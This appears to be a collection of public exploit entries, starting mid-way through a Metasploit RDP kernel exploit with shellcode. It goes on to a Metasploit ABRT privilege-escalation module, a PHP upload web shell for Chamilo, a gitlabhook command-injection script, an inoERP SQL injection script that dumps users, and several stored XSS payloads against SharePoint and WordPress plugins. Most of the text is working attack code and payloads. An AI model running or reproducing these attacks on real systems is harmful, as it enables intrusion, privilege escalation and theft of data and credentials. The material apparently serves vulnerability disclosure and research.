[rsi - 8] cmp rax, rdi jnz _inner_find_user_egg_loop pop rdi ;--------------------------- END HACK EGG USER ------------ mov ecx, 0x380 ; fix payload size to 0x380 bytes rep movsb ;====================================== ; find CreateThread address (in kernel32.dll) ;====================================== mov rax, [rbp+#{data_peb_addr_offset}] mov rax, [rax + 0x18] ; PEB->Ldr mov rax, [rax + 0x20] ; InMemoryOrder list ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address ;mov rbx, rsi ; use rbx for iterating thread _find_kernel32_dll_loop: mov rax, [rax] ; first one always be executable ; offset 0x38 (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll) ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll) ; offset 0x50 => is name ; offset 0x20 => is dllbase ;cmp word [rax+0x38], 0x40 ;jne _find_kernel32_dll_loop cmp word [rax+0x48], 0x18 jne _find_kernel32_dll_loop mov rdx, [rax+0x50] ; check only "32" because name might be lowercase or uppercase cmp dword [rdx+0xc], 0x00320033 ; 3\x002\x00 jnz _find_kernel32_dll_loop ;int3 mov r15, [rax+0x20] mov edi, #{createthread_hash} call get_proc_addr ; save CreateThread address to SystemArgument1 mov [rbx], rax _kernel_kapc_routine_exit: xor ecx, ecx ; clear queueing kapc flag, allow other hijacked system call to run shellcode mov byte [rbp+#{data_queueing_kapc_offset}], cl ; restore IRQL to APC_LEVEL mov cl, 1 mov cr8, rcx pop r15 pop rsi pop rdi pop rbx pop rbp ret userland_start_thread: ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL) xchg rdx, rax ; rdx is CreateThread address passed from kernel xor ecx, ecx ; lpThreadAttributes = NULL push rcx ; lpThreadId = NULL push rcx ; dwCreationFlags = 0 mov r9, rcx ; lpParameter = NULL lea r8, [rel userland_payload] ; lpStartAddr mov edx, ecx ; dwStackSize = 0 sub rsp, 0x20 call rax add rsp, 0x30 ret userland_payload: ^ [ KERNELMODE_EGG, assemble_with_fixups(asm) ].pack('<Qa*') end def create_free_trigger(chan_user_id, chan_id) # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20) vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}") # The extra bytes on the end of the body is what causes the bad things to happen body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22 rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF) end def create_exploit_channel_buffer(target_addr) overspray_addr = target_addr + 0x2000 shellcode_vtbl = target_addr + HEADER_SIZE magic_value1 = overspray_addr + 0x810 magic_value2 = overspray_addr + 0x48 magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE # first 0x38 bytes are used by DATA PDU packet # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm [ [ # SystemResourceList (2 pointers, each 8 bytes) # Pointer to OWNER_ENTRY (8 bytes) # ActiveCount (SHORT, 2 bytes) # Flag (WORD, 2 bytes) # Padding (BYTE[4], 4 bytes) x64 only 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) magic_value2, # OwnerThread (ULONG, 8 bytes) magic_value2, # TableSize (ULONG, 8 bytes) 0x0, # ActiveEntries (DWORD, 4 bytes) 0x0, # ContenttionCount (DWORD, 4 bytes) 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) 0x0, # Reserved2 (PVOID, 8 bytes) x64 only magic_value2, # Address (PVOID, 8 bytes) 0x0, # SpinLock (UINT_PTR, 8 bytes) ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), [ magic_value2, # SystemResourceList (2 pointers, each 8 bytes) magic_value2, # -------------------- 0x0, # Pointer to OWNER_ENTRY (8 bytes) 0x0, # ActiveCount (SHORT, 2 bytes) 0x0, # Flag (WORD, 2 bytes) 0x0, # Padding (BYTE[4], 4 bytes) x64 only 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) magic_value2, # OwnerThread (ULONG, 8 bytes) magic_value2, # TableSize (ULONG, 8 bytes) 0x0, # ActiveEntries (DWORD, 4 bytes) 0x0, # ContenttionCount (DWORD, 4 bytes) 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) 0x0, # Reserved2 (PVOID, 8 bytes) x64 only magic_value2, # Address (PVOID, 8 bytes) 0x0, # SpinLock (UINT_PTR, 8 bytes) ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), [ 0x1F, # ClassOffset (DWORD, 4 bytes) 0x0, # bindStatus (DWORD, 4 bytes) 0x72, # lockCount1 (QWORD, 8 bytes) magic_value3, # connection (QWORD, 8 bytes) shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes) 0x5, # channelClass (DWORD, 4 bytes) "MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes) 0x1F, # channelIndex (DWORD, 4 bytes) magic_value1, # channels (QWORD, 8 bytes) magic_value1, # connChannelsAddr (POINTER, 8 bytes) magic_value1, # list1 (QWORD, 8 bytes) magic_value1, # list1 (QWORD, 8 bytes) magic_value1, # list2 (QWORD, 8 bytes) magic_value1, # list2 (QWORD, 8 bytes) 0x65756c62, # inputBufferLen (DWORD, 4 bytes) 0x7065656b, # inputBufferLen (DWORD, 4 bytes) magic_value1, # connResrouce (QWORD, 8 bytes) 0x65756c62, # lockCount158 (DWORD, 4 bytes) 0x7065656b, # dword15C (DWORD, 4 bytes) ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L') ].join('') end end

# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting # Author: Davide Cioccia # Discovery Date: 2019-09-25 # Vendor Homepage: https://www.microsoft.com # Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1 # Tested Version: SP1 # Tested on: Microsoft Windows Server 2016 # CVE: CVE-2019-1262 # Advisory ID: ZSL-2019-5533 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php # MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262 Vendor: Microsoft Corporation Product web page: https://www.microsoft.com Affected version: 2013 SP1 Summary: SharePoint is a web-based collaborative platform that integrates with Microsoft Office. Launched in 2001, SharePoint is primarily sold as a document management and storage system, but the product is highly configurable and usage varies substantially among organizations. Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. Sharepoint 2013 SP1 allows users to upload files to the platform, but does not correctly sanitize the filename when the files are listed. An authenticated user that has the rights to upload files to the SharePoint platform, is able to exploit a Stored Cross-Site Scripting vulnerability in the filename. The filename is reflected in the attribute 'aria-label' of the following HTML tag. # PoC request: POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1 Host: vulnerable_sharepoint_2013 Connection: close Content-Length: 31337 Cache-Control: max-age=0 Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ== Origin: https://vulnerable_sharepoint_2013.tld Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Sec-Fetch-Mode: nested-navigate Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6 Cookie: ... ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_SelectedWpId" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_View" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_ShowSettings" False ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOGallery_SelectedLibrary" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOGallery_FilterString" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_Button" none ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTTARGET" ctl00$PlaceHolderMain$ctl00$RptControls$btnOK ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName" Browse ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOWebPartPage_Shared" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOLayout_LayoutChanges" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOLayout_InDesignMode" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName" Browse ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__REQUESTDIGEST" [DIGEST] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__VIEWSTATE" [VIEWSTATE] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" E6912F23 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__SCROLLPOSITIONX" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__SCROLLPOSITIONY" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTVALIDATION" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="destination" [DESTINATION_FOLDER] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg" Content-Type: image/jpeg ZSL ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle" on ------WebKitFormBoundaryewNI1MC6qaHDB50n--

# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service # Date: 2019-20-09 # Exploit Author: Emilio Revelo # Vendor Homepage: http://www.nsauditor.com/ # Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe # Tested on: Windows 10 Pro x64 es # Version: 2.9.5 # Steps to produce the DoS: # 1.- Run perl script : perl SpotIE.pl # 2.- Open SpotIE.txt and copy the content to clipboard # 3.- Open SpotIE Internet Explorer Password Recovery # 4.- Navigate to Register -> Enter the registration name and key below... # 5.- Paste ClipBoard on "Key:" # 7.- Ok # 8.- Observe the program crash. #!/usr/local/bin/perl use strict; use warnings; my $filename = 'SpotIE.txt'; open(my $fh, '>', $filename) or die "Could not open file '$filename' $!"; print $fh "E"x256; close $fh; print "Done!\n"; print "File: SpotIE.txt\n"

# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting # Date: 2019-09-10 # Exploit Author: strider # Software Link: https://github.com/anttiviljami/wp-server-log-viewer # Version: 1.0 # Tested on: Debian 10 Buster x64 / Kali Linux # CVE : None ====================================[Description]==================================== This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack. ====================================[Codepart]==================================== if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) { // new log was added $logs = get_option( 'server_logs' ); if( is_null( $logs ) ) { $logs = []; } $log = trim( $_GET['logpath'] ); //only trimmed string no escaping $logs[] = $log; //here the log will be added without security checks $logs = array_values( $logs ); $index = array_search( $log, $logs ); update_option( 'server_logs', $logs ); wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) ); } ====================================[Proof of Concept]==================================== Add new log file to the plugin. paste this exploit into the form and submit it. <img src=# onerror=alert(document.cookie);>log.txt It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution # Date: 2019-09-13 # Exploit Author: Semen Alexandrovich Lyhin # Vendor Homepage: https://www.npmjs.com/package/gitlabhook # Version: 0.0.17 # Tested on: Kali Linux 2, Windows 10. # CVE : CVE-2019-5485 #!/usr/bin/python import requests target = "http://TARGET:3420" cmd = r"touch /tmp/poc.txt" json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd r = requests.post(target, json) print "Done."

# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload # Google Dork: "powered by chamilo" # Date: 2018-10-05 # Exploit Author: Sohel Yousef jellyfish security team # Software Link: https://chamilo.org/en/download/ # Version: Chamilo 1.11.8 or lower to 1.8 # Category: webapps # 1. Description # Any registered user can upload files and rename and change the file type to # php5 or php7 by ckeditor module in my files section # register here : # http://localhost/chamilo//main/auth/inscription.php # after registration you can view this sections # http://localhost/chamilo/main/social/myfiles.php # http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0 # upload your shell in gif format and then rename the format # if the rename function was desabled and add this GIF89;aGIF89;aGIF89;a before <?PHP # to be like this for examlple GIF89;aGIF89;aGIF89;a<html> <head> <title>PHP Test</title> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="upload file" name="submit"> </form> </head> <body> <?php echo '<p>FILE UPLOAD</p><br>'; $tgt_dir = "uploads/"; $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']); echo "<br>TARGET FILE= ".$tgt_file; //$filename = $_FILES['fileToUpload']['name']; echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"]; if(isset($_POST['submit'])) { if(file_exists("uploads/".$_FILES["fileToUpload"]["name"])) { echo "<br>file exists, try with another name"; } else { echo "<br>STARTING UPLOAD PROCESS<br>"; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $tgt_file)) { echo "<br>File UPLOADED:- ".$tgt_file; } else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; } } } ?> </body> </html> # and uplaod it as php.gif # you can browse the files form right click and click on browse option

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ABRT sosreport Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. `sosreport` uses an insecure temporary directory, allowing local users to write to arbitrary files (CVE-2015-5287). This module uses a symlink attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path in `/proc/sys/kernel/modprobe`, resulting in root privileges. Waiting for `sosreport` could take a few minutes. This module has been tested successfully on: abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and abrt 2.1.11-19.el7 on RHEL 7.1 x86_64. }, 'License' => MSF_LICENSE, 'Author' => [ 'rebel', # Discovery and sosreport-rhel7.py exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2015-11-23', 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [[ 'Auto', {} ]], 'References' => [ ['BID', '78137'], ['CVE', '2015-5287'], ['EDB', '38832'], ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'], ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'], ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837'] ] )) register_options [ OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'] end def timeout datastore['TIMEOUT'] end def check kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern' unless kernel_core_pattern.include? 'abrt-hook-ccpp' vprint_error 'System is not configured to use ABRT for crash reporting' return CheckCode::Safe end vprint_good 'System is configured to use ABRT for crash reporting' if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive' vprint_error 'abrt-ccp service not running' return CheckCode::Safe end vprint_good 'abrt-ccpp service is running' # Patched in 2.1.11-35.el7 pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1] if abrt_version.blank? vprint_status 'Could not retrieve ABRT package version' return CheckCode::Safe end unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7') vprint_status "ABRT package version #{abrt_version} is not vulnerable" return CheckCode::Safe end vprint_good "ABRT package version #{abrt_version} is vulnerable" unless command_exists? 'python' vprint_error 'python is not installed' return CheckCode::Safe end vprint_good 'python is installed' CheckCode::Appears end def upload_and_chmodx(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data chmod path register_file_for_cleanup path end def exploit unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py') exe_name = ".#{rand_text_alphanumeric 5..10}" exe_path = "#{base_dir}/#{exe_name}" upload_and_chmodx exe_path, exe_data payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload_and_chmodx payload_path, generate_payload_exe register_file_for_cleanup '/tmp/hax.sh' print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..." output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout output.each_line { |line| vprint_status line.chomp } end end

# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection # Exploit Author: Debashis Pal # Vendor Homepage: http://www.yzmcms.com/ # Source: https://github.com/yzmcms/yzmcms # Version: YzmCMS V5.3 # CVE : N/A # Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9 #About YzmCMS ============== YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework. #Vulnerability =============== Host Header Injection. #PoC ===== #YzmCMS V5.3 Access Path: TARGET/yzmcms/ curl http://TARGET/yzmcms/ -H "Host: www.google.com" //sample output start <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>YzmCMS - 演示站</title> <link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" /> <link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script> <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script> <script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js --> <meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" /> <meta name="description" content="本站是yzmcms演示站点" /> <meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile"> <script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script> </head> <body> <!--mini登陆条--> <div id="head_login"> <div class="w1000"> <div id="mini"> <a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html" target="_blank">登录</a> </div> 欢迎光临本站！ </div> </div> <!--网站容器--> <div id="container"> <div id="header"> <div id="logo"> <a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a> </div> <div id="search"> <form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank"> <div id="searchtxt" class="searchtxt"> <div class="searchmenu"> //sample output End #Solution ========== Don’t trust the host header. Only allow whitelist hostnames. #Disclosure Timeline ==================== Vulnerability Discover Date: 18-Sep-2019 Vulnerability Notification To vendor via Email: 18-Sep-2019, no responds Open issue in github : 22-Sep-2019, no responds Submit exploit-db : 25-Sep-2019 #Disclaimer ========== The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-06-11 # Exploit Author: Unk9vvN # Vendor Homepage: https://duplicate-post.lopo.it/ # Software Link: https://wordpress.org/plugins/duplicate-post/ # Version: 3.2.3 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows. 1.Go to the 'Settings' section 2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections 3.Click the "Save Changes" option 4.Your payload will run # URI: http://localhost/wp-admin/options-general.php?page=duplicatepost # Parameter & Payoad: duplicate_post_title_prefix="><script>alert(1)</script> duplicate_post_title_suffix="><script>alert(1)</script> duplicate_post_increase_menu_order_by="><script>alert(1)</script> duplicate_post_blacklist="><script>alert(1)</script> # # PoC # POST /wp-admin/options.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost Content-Type: application/x-www-form-urlencoded Content-Length: 981 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1 # Discovered by: https://t.me/Unk9vvN

# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version # Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/ # Version: 3.2.7 # Tested on: Windows 10 # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the all-in-one-seo-pack tab inside the and the vulnerability type is stored . the vulnerability parameters are as follows. 1.Go to the 'all-in-one-seo-pack' tab 2.Select 'general settings' section 3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section 4.Click the "Update Options" option 4.Your payload will run on visit page # URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack # Payload: "><script>alert(1)</script> # # PoC # POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php Content-Type: multipart/form-data; boundary=---------------------------24442753012045 Content-Length: 8625 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------24442753012045 Content-Disposition: form-data; name="aiosp_front_meta_tags" "><script>alert(1)</script> -----------------------------24442753012045 Content-Disposition: form-data; name="aiosp_home_meta_tags" "><script>alert(1)</script> -----------------------------24442753012045 Content-Disposition: form-data; name="Submit" Update Options » -----------------------------24442753012045-- # Discovered by: https://unk9vvn.com

# Exploit Title: inoERP 4.15 - 'download' SQL Injection # Date: 2019-09-13 # Exploit Author: Semen Alexandrovich Lyhin # Vendor Homepage: http://inoideas.org/ # Version: 4.15 # CVE: N/A # A malicious query can be sent in base64 encoding to unserialize() function. # It can be deserialized without any sanitization then. # After it, it gets passed directly to the SQL query. #!/bin/python import os import base64 import requests import sys def generatePayload(query): #THIS FUNCTION IS INSECURE BY DESIGN b64_query = base64.b64encode(query); return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read() def ExecSQL(query): data = {"data":query, "data_type":"sql_query"} r = requests.post("http://" + ip + "/download.php", data=data) return r.content if __name__ == "__main__": if len(sys.argv) != 3: print '(+) usage: %s <target> ' % sys.argv[0] print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0] exit() ip = sys.argv[1] + "/" + sys.argv[2] #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== data = r"select * from ino_user;" print ExecSQL(generatePayload(data));

